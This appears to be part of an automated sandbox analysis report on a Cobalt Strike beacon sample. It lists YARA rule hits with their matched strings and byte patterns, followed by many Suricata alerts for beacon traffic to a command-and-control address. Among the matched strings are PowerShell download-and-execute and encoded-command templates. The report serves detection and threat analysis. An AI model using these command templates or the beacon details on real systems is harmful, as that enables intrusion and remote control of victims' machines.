0.2.THsSNYblMw.exe.6a0000.1.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2fa8f:$s1: %%IMPORT%% 0x2ef87:$s2: www6.%x%x.%s 0x2ef7b:$s3: cdn.%x%x.%s 0x2f203:$s4: api.%x%x.%s 0x2ff70:$s5: %s (admin) 0x2f272:$s6: could not spawn %s: %d 0x2fb33:$s7: Could not kill %d: %d 0x2f34c:$s8: Could not connect to pipe (%s): %d 0x2ef94:$s9: %s.1%x.%x%x.%s 0x2efa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f01b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f07e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f0c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2f138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2f1a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2f1c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2f1dd:$s9: %s.1%08x%08x.%x%x.%s 0x2f1f2:$s9: %s.1%08x.%x%x.%s
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x309a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x314b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x314b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x30a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x30ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31501:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x30d6f:$a11: Could not open service control manager on %s: %d 0x312a1:$a12: %d is an x64 process (can't inject x86 content) 0x312d1:$a13: %d is an x86 process (can't inject x64 content) 0x315f2:$a14: Failed to impersonate logged on user %d (%u) 0x3125a:$a15: could not create remote thread in %d: %d 0x30b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31208:$a17: could not write to process memory: %d 0x30da0:$a18: Could not create service %s on %s: %d 0x30e29:$a19: Could not delete service %s on %s: %d 0x30c89:$a20: Could not open process token: %d (%u)
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1b8f4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17b3a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x314b7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31501:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x312d1:$x3: %d is an x86 process (can't inject x64 content) 0x30c89:$s1: Could not open process token: %d (%u) 0x309a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30d4c:$s4: Could not connect to pipe (%s): %d
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3fb21:$loader_export: ReflectiveLoader 0x30960:$exportname: beacon.dll
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x312a1:$x2: %d is an x64 process (can't inject x86 content) 0x315f2:$x3: Failed to impersonate logged on user %d (%u) 0x31501:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x314b7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x30c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31208:$s4: could not write to process memory: %d 0x309a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30d4c:$s6: Could not connect to pipe (%s): %d
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31970:$str1: %s (admin) 0x30960:$str2: beacon.dll
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31501:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x312d1:$x2: %d is an x86 process (can't inject x64 content) 0x314b7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3159b:$x4: Failed to impersonate token from %d (%u) 0x315f2:$x5: Failed to impersonate logged on user %d (%u) 0x309a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.THsSNYblMw.exe.6a0000.1.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3148f:$s1: %%IMPORT%% 0x30987:$s2: www6.%x%x.%s 0x3097b:$s3: cdn.%x%x.%s 0x30c03:$s4: api.%x%x.%s 0x31970:$s5: %s (admin) 0x30c72:$s6: could not spawn %s: %d 0x31533:$s7: Could not kill %d: %d 0x30d4c:$s8: Could not connect to pipe (%s): %d 0x30994:$s9: %s.1%x.%x%x.%s 0x309a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x30b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x30ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x30bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x30bdd:$s9: %s.1%08x%08x.%x%x.%s 0x30bf2:$s9: %s.1%08x.%x%x.%s
Click to see the 20 entries

Suricata Signatures

ET MALWARE Cobalt Strike Beacon Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T23:07:04.635223+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49731	47.121.190.121	81	TCP
2025-01-09T23:07:05.715364+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49732	47.121.190.121	81	TCP
2025-01-09T23:07:06.961348+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49733	47.121.190.121	81	TCP
2025-01-09T23:07:08.025242+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49734	47.121.190.121	81	TCP
2025-01-09T23:07:09.112047+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49735	47.121.190.121	81	TCP
2025-01-09T23:07:10.188069+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49736	47.121.190.121	81	TCP
2025-01-09T23:07:11.235516+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49737	47.121.190.121	81	TCP
2025-01-09T23:07:12.299871+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49738	47.121.190.121	81	TCP
2025-01-09T23:07:13.522816+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49739	47.121.190.121	81	TCP
2025-01-09T23:07:14.573406+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49740	47.121.190.121	81	TCP
2025-01-09T23:07:15.719039+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49741	47.121.190.121	81	TCP
2025-01-09T23:07:16.795211+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49743	47.121.190.121	81	TCP
2025-01-09T23:07:17.879867+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49747	47.121.190.121	81	TCP
2025-01-09T23:07:18.937068+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49749	47.121.190.121	81	TCP
2025-01-09T23:07:19.996500+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49751	47.121.190.121	81	TCP
2025-01-09T23:07:21.066023+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49752	47.121.190.121	81	TCP
2025-01-09T23:07:22.114665+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49753	47.121.190.121	81	TCP
2025-01-09T23:07:23.193205+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49754	47.121.190.121	81	TCP
2025-01-09T23:07:24.239252+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49755	47.121.190.121	81	TCP
2025-01-09T23:07:25.283377+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49756	47.121.190.121	81	TCP
2025-01-09T23:07:26.363516+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49757	47.121.190.121	81	TCP
2025-01-09T23:07:27.462058+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49758	47.121.190.121	81	TCP
2025-01-09T23:07:28.531254+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49759	47.121.190.121	81	TCP
2025-01-09T23:07:29.594575+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49760	47.121.190.121	81	TCP
2025-01-09T23:07:30.651421+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49761	47.121.190.121	81	TCP
2025-01-09T23:07:31.733396+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49762	47.121.190.121	81	TCP
2025-01-09T23:07:32.823666+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49763	47.121.190.121	81	TCP
2025-01-09T23:07:34.699446+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49764	47.121.190.121	81	TCP
2025-01-09T23:07:35.823795+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49765	47.121.190.121	81	TCP
2025-01-09T23:07:36.904160+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49766	47.121.190.121	81	TCP
2025-01-09T23:07:37.954456+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49767	47.121.190.121	81	TCP
2025-01-09T23:07:39.009812+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49768	47.121.190.121	81	TCP
2025-01-09T23:07:40.069644+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49769	47.121.190.121	81	TCP
2025-01-09T23:07:41.239880+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49770	47.121.190.121	81	TCP
2025-01-09T23:07:42.298132+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49771	47.121.190.121	81	TCP
2025-01-09T23:07:43.354796+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49772	47.121.190.121	81	TCP
2025-01-09T23:07:44.428789+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49773	47.121.190.121	81	TCP
2025-01-09T23:07:45.505750+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49774	47.121.190.121	81	TCP
2025-01-09T23:07:46.595841+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49775	47.121.190.121	81	TCP
2025-01-09T23:07:47.676742+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49776	47.121.190.121	81	TCP
2025-01-09T23:07:48.736822+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49777	47.121.190.121	81	TCP
2025-01-09T23:07:49.843678+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49778	47.121.190.121	81	TCP
2025-01-09T23:07:50.958534+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49779	47.121.190.121	81	TCP
2025-01-09T23:07:52.036441+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49780	47.121.190.121	81	TCP
2025-01-09T23:07:53.106341+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49781	47.121.190.121	81	TCP
2025-01-09T23:07:54.162834+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49782	47.121.190.121	81	TCP
2025-01-09T23:07:55.246288+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49784	47.121.190.121	81	TCP
2025-01-09T23:07:59.704018+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49786	47.121.190.121	81	TCP
2025-01-09T23:08:00.819303+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49812	47.121.190.121	81	TCP
2025-01-09T23:08:01.886869+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49818	47.121.190.121	81	TCP
2025-01-09T23:08:03.011918+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49825	47.121.190.121	81	TCP
2025-01-09T23:08:04.069128+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49835	47.121.190.121	81	TCP
2025-01-09T23:08:05.132016+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49841	47.121.190.121	81	TCP
2025-01-09T23:08:06.217497+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49850	47.121.190.121	81	TCP
2025-01-09T23:08:07.289304+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49857	47.121.190.121	81	TCP
2025-01-09T23:08:08.357258+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49864	47.121.190.121	81	TCP
2025-01-09T23:08:12.425546+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49871	47.121.190.121	81	TCP
2025-01-09T23:08:13.508031+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49898	47.121.190.121	81	TCP
2025-01-09T23:08:14.642770+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49906	47.121.190.121	81	TCP
2025-01-09T23:08:15.695114+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49915	47.121.190.121	81	TCP
2025-01-09T23:08:16.763535+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49922	47.121.190.121	81	TCP
2025-01-09T23:08:17.823582+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49928	47.121.190.121	81	TCP
2025-01-09T23:08:18.882359+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49936	47.121.190.121	81	TCP
2025-01-09T23:08:19.957964+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49942	47.121.190.121	81	TCP
2025-01-09T23:08:21.012535+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49952	47.121.190.121	81	TCP
2025-01-09T23:08:22.085328+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49959	47.121.190.121	81	TCP
2025-01-09T23:08:23.145392+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49967	47.121.190.121	81	TCP
2025-01-09T23:08:24.207380+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49976	47.121.190.121	81	TCP
2025-01-09T23:08:25.305702+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49982	47.121.190.121	81	TCP
2025-01-09T23:08:26.543299+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49993	47.121.190.121	81	TCP
2025-01-09T23:08:27.603685+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49999	47.121.190.121	81	TCP
2025-01-09T23:08:28.670084+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50006	47.121.190.121	81	TCP
2025-01-09T23:08:29.765034+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50013	47.121.190.121	81	TCP
2025-01-09T23:08:30.945555+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50020	47.121.190.121	81	TCP
2025-01-09T23:08:32.010589+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50026	47.121.190.121	81	TCP
2025-01-09T23:08:33.098788+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50035	47.121.190.121	81	TCP
2025-01-09T23:08:34.161958+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50041	47.121.190.121	81	TCP
2025-01-09T23:08:35.276091+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50050	47.121.190.121	81	TCP
2025-01-09T23:08:36.395230+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50058	47.121.190.121	81	TCP
2025-01-09T23:08:37.566627+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50066	47.121.190.121	81	TCP
2025-01-09T23:08:38.651423+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50075	47.121.190.121	81	TCP
2025-01-09T23:08:39.745896+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50082	47.121.190.121	81	TCP
2025-01-09T23:08:40.859068+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50085	47.121.190.121	81	TCP
2025-01-09T23:08:41.934344+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50086	47.121.190.121	81	TCP
2025-01-09T23:08:43.047311+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50087	47.121.190.121	81	TCP
2025-01-09T23:08:44.105737+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50088	47.121.190.121	81	TCP
2025-01-09T23:08:45.247245+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50089	47.121.190.121	81	TCP
2025-01-09T23:08:46.374708+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50090	47.121.190.121	81	TCP
2025-01-09T23:08:47.489114+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50091	47.121.190.121	81	TCP
2025-01-09T23:08:48.603602+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50092	47.121.190.121	81	TCP
2025-01-09T23:08:49.750000+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50093	47.121.190.121	81	TCP
2025-01-09T23:08:50.826905+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50094	47.121.190.121	81	TCP
2025-01-09T23:08:51.897079+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50095	47.121.190.121	81	TCP
2025-01-09T23:08:52.992887+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50096	47.121.190.121	81	TCP
2025-01-09T23:08:54.053626+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50097	47.121.190.121	81	TCP
2025-01-09T23:08:55.109529+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50098	47.121.190.121	81	TCP
2025-01-09T23:08:56.176884+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50099	47.121.190.121	81	TCP
2025-01-09T23:08:57.253759+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50100	47.121.190.121	81	TCP
2025-01-09T23:08:58.318812+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50101	47.121.190.121	81	TCP
2025-01-09T23:08:59.388457+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50102	47.121.190.121	81	TCP
2025-01-09T23:09:00.458663+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50103	47.121.190.121	81	TCP
2025-01-09T23:09:01.555646+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50104	47.121.190.121	81	TCP
2025-01-09T23:09:02.652276+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50105	47.121.190.121	81	TCP
2025-01-09T23:09:03.723448+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50106	47.121.190.121	81	TCP
2025-01-09T23:09:04.779411+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50107	47.121.190.121	81	TCP
2025-01-09T23:09:05.863235+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50108	47.121.190.121	81	TCP
2025-01-09T23:09:06.941054+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50109	47.121.190.121	81	TCP
2025-01-09T23:09:07.999618+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50110	47.121.190.121	81	TCP
2025-01-09T23:09:09.078171+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50111	47.121.190.121	81	TCP
2025-01-09T23:09:10.157383+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50112	47.121.190.121	81	TCP
2025-01-09T23:09:11.227208+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50113	47.121.190.121	81	TCP
2025-01-09T23:09:12.325180+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50114	47.121.190.121	81	TCP
2025-01-09T23:09:13.392270+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50115	47.121.190.121	81	TCP
2025-01-09T23:09:14.447803+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50116	47.121.190.121	81	TCP
2025-01-09T23:09:15.547290+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50117	47.121.190.121	81	TCP
2025-01-09T23:09:16.610919+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50118	47.121.190.121	81	TCP
2025-01-09T23:09:17.671540+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50119	47.121.190.121	81	TCP
2025-01-09T23:09:18.747791+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50120	47.121.190.121	81	TCP
2025-01-09T23:09:19.847375+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50121	47.121.190.121	81	TCP
2025-01-09T23:09:23.968270+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50122	47.121.190.121	81	TCP
2025-01-09T23:09:25.018106+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50123	47.121.190.121	81	TCP
2025-01-09T23:09:26.069300+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50124	47.121.190.121	81	TCP
2025-01-09T23:09:27.124761+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50125	47.121.190.121	81	TCP
2025-01-09T23:09:28.209149+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50126	47.121.190.121	81	TCP
2025-01-09T23:09:29.284759+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50127	47.121.190.121	81	TCP
2025-01-09T23:09:30.368000+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50128	47.121.190.121	81	TCP
2025-01-09T23:09:31.464734+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50129	47.121.190.121	81	TCP
2025-01-09T23:09:32.539687+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50130	47.121.190.121	81	TCP
2025-01-09T23:09:33.600675+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50131	47.121.190.121	81	TCP
2025-01-09T23:09:34.660226+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50132	47.121.190.121	81	TCP
2025-01-09T23:09:35.732148+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50133	47.121.190.121	81	TCP
2025-01-09T23:09:36.780480+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50134	47.121.190.121	81	TCP
2025-01-09T23:09:38.038491+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50135	47.121.190.121	81	TCP
2025-01-09T23:09:39.082770+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50136	47.121.190.121	81	TCP
2025-01-09T23:09:40.165631+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50137	47.121.190.121	81	TCP
2025-01-09T23:09:41.265275+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50138	47.121.190.121	81	TCP
2025-01-09T23:09:42.315792+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50139	47.121.190.121	81	TCP
2025-01-09T23:09:43.375472+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50140	47.121.190.121	81	TCP
2025-01-09T23:09:44.465869+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50141	47.121.190.121	81	TCP
2025-01-09T23:09:45.528453+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50142	47.121.190.121	81	TCP
2025-01-09T23:09:46.600344+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50143	47.121.190.121	81	TCP
2025-01-09T23:09:47.667071+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50144	47.121.190.121	81	TCP
2025-01-09T23:09:48.750129+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50145	47.121.190.121	81	TCP
2025-01-09T23:09:49.825052+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50146	47.121.190.121	81	TCP
2025-01-09T23:09:50.897630+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50147	47.121.190.121	81	TCP
2025-01-09T23:09:51.951336+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50148	47.121.190.121	81	TCP
2025-01-09T23:09:53.012152+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50149	47.121.190.121	81	TCP
2025-01-09T23:09:54.105508+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50150	47.121.190.121	81	TCP
2025-01-09T23:09:55.172245+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50151	47.121.190.121	81	TCP
2025-01-09T23:09:56.248402+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50152	47.121.190.121	81	TCP
2025-01-09T23:09:57.320936+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50153	47.121.190.121	81	TCP
2025-01-09T23:09:58.406051+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50154	47.121.190.121	81	TCP
2025-01-09T23:09:59.544603+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50155	47.121.190.121	81	TCP
2025-01-09T23:10:00.607551+0100	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50156	47.121.190.121	81	TCP
